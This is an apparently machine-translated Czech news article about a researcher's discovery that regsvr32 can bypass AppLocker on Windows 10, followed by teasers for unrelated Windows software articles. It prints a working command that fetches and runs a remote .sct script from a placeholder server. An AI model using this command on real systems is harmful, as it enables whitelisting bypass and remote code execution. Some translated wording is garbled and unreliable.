Regsvr32 lze použít k obcházení applocker na Windows 10
Video: Allow Windows to Run Specified Programs Only 2024
Výzkumník z Colorada, který se jmenuje Casey Smith, zjistil, že Regsvr32 lze použít k obejití AppLocker ve Windows 10, což je velký problém pro uživatele počítačů, zejména pro ty, kteří pracují v obchodním prostředí.
AppLocker byl poprvé představen ve Windows 7 a Windows Server 2008 R2. Je navržen tak, aby správcům umožnil určit, která skupina nebo uživatelé mohou využít některé nebo všechny aplikace na základě jedinečné identity souborů. Pokud jste osoba, která má tendenci používat AppLocker, pak by mělo být všeobecně známo, že lze použít k vytvoření určitých pravidel, která aplikacím umožní jejich spuštění nebo zastavení v jejich stopách.
Pro ty, kteří možná nevědí, lze Regvr32 použít k registraci a zrušení registrace DLL. Nejedná se o nástroj na jedno kliknutí, protože se jedná o obslužný program příkazového řádku, takže pouze pokročilí uživatelé počítačů by se měli snažit využít toho, co nabízí.
Chápeme, že pomocí této techniky to nezmění registr počítačového systému, což administrátorům ztěžuje vědět, zda byly provedeny nějaké změny.
regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll
"Úžasná věc je, že regsvr32 je již na serveru proxy, používá TLS, následuje přesměrování atd. … A … uhádli jste podepsaný výchozí binární MS." Vše, co musíte udělat, je tedy hostit soubor your.sct na místě, které ovládáte, “napsal Smith.
Výše uvedená technika nevyžaduje oprávnění správce a nezmění registr. Skripty lze navíc volat přes HTTP nebo HTTPS. V tuto chvíli společnost Microsoft nevydala opravu tohoto malého problému, takže jedinou možností v tomto okamžiku je blokování programu Regsvr32 pomocí brány Windows Firewall.
Je zajímavé, že softwarový gigant musí ještě odpovědět na tento bezpečnostní problém, kterému čelí jeho operační systém. Nyní, když je venku, očekáváme, že se něco od společnosti dozví spolu s rozhovory o budoucí opravě.
Nejlepší software pro uzamčení čepic, který lze použít v systému Windows
Klávesa Caps Lock aktivuje veškerý text zadaný při aktivaci. Přichází tento klíč někdy k ničemu? Nejsme si jistí, že se to liší od těch velmi zřídkavých okamžiků, kdy je třeba zadat spoustu velkých písmen. Většina klávesnic má kontrolky, které zvýrazňují, pokud jste toto tlačítko aktivovali, ale většina bezdrátových a…
5 nejlepších kryptomobilních blokátorů, které lze použít na počítači se systémem Windows
V článku zveřejněném v říjnu 2017 Fortune navrhl, že kryptomobil je další významnou bezpečnostní hrozbou v online světě. Kryptoměny a zejména bitcoiny vyvolaly mezi uživateli obrovské šílenství. Mnoho nainstalovaných kryptografických programů do svých počítačů doufalo, že udeří digitální zlato. Nedávné zprávy mnoha společností zabývajících se kybernetickou bezpečností odhalily, že mnoho subjektů (včetně…
5 Nejlepší potenciálně nežádoucí nástroje pro odstraňování programů, které lze použít ve Windows 10
Dnes vám ukážeme pět nejlepších nástrojů pro odstranění potenciálně nechtěného programu pro Windows PC. Možná vás zajímá, co je potenciálně nežádoucí program (PUP)? Začneme tedy definováním PUP. Potenciálně nežádoucí program je software, který se do vašeho systému dostane při instalaci jiného programu. K tomu obvykle dochází, když instalujete ...